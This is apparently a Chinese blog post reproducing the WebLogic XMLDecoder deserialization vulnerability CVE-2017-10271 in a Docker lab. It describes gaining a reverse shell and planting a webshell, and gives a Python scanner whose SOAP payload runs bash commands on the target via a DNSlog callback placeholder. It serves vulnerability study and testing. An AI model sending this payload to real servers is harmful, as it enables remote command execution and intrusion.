Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)

前言

对 Weblogic 系列的相关漏洞进行复现,并编写相关漏洞的扫描器。

漏洞介绍

影响版本:Weblogic < 10.3.6

Weblogic 的 WLS Security 组件对外提供 webservice 服务,其中使用了 XMLDecoder 来解析用户传入的 XML 数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

环境搭建

启动测试环境:

docker compose up -d

等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。

访问:http://127.0.0.1:7001/wls-wsat/CoordinatorPortType 出现如下页面证明存在漏洞

漏洞复现

发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误),访问发送数据包后状态码为500即证明反弹shell成功。

成功获取shell:

写入webshell,状态码为500

访问:http://127.0.0.1:7001/bea_wls_internal/test.jsp 出现如下页面即位写入成功

代码

python 复制代码
import requests

payload_url = 'http://127.0.0.1:7001/'
check_url = 'wls-wsat/CoordinatorPortType'

def weblogic_cve_2017_10271(url):
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
        'Content-Type': 'text/xml'
    }
    payload = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                <java version="1.4.0" class="java.beans.XMLDecoder">
                    <void class="java.lang.ProcessBuilder">
                        <array class="java.lang.String" length="3">
                            <void index="0">
                                <string>/bin/bash</string>
                            </void>
                            <void index="1">
                                <string>-c</string>
                            </void>
                            <void index="2">
                                <string>这里是在DNSlog.cn网站得到随机DNSlog地址</string>
                            </void>
                        </array>
                        <void method="start"/>
                    </void>
                </java>
            </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body/>
    </soapenv:Envelope>
    '''
    response = requests.get(url+check_url, data=payload, headers=headers)
    if response.status_code == 500:
        print("漏洞存在")
    else:
        print("漏洞不存在")
相关推荐
聪明的一休丶16 小时前
VLLM v0.24.0 版本深度解析:新引擎、新架构与大规模服务全家桶升级
python·架构·vllm
万亿少女的梦16817 小时前
基于Python的高考志愿填报辅助系统设计与实现
java·spring boot·python·mysql·vue
闲猫18 小时前
Python FastAPI + SQLAlchemy 入门教程:从零搭建你的第一个 Web 应用
前端·python·fastapi
北极星日淘21 小时前
中古货品品相评级算法实战|Java权重计分实现标准化五级品相体系
开发语言·python
hangyuekejiGEO21 小时前
临沂GEO服务企业技术选型分析
人工智能·python
闲猫1 天前
Python 虚拟环境 virtualenv & uvicorn 服务搭建 & FAstAPI 使用
开发语言·python
AI视觉网奇1 天前
vllm 多卡部署
python
精明的身影1 天前
网络计划WebApp求解:融合Python与AI决策的项目管理系统
网络·python·web app
AI科技星1 天前
全域谱分析:无穷维超复数信息场分形统一场论——自然、量子、金融多重分形第一性原理完整体系(中英双语终稿)
人工智能·python·算法·金融·乖乖数学·全域数学
用户0332126663671 天前
使用 Python 在 Word 文档中添加批注
python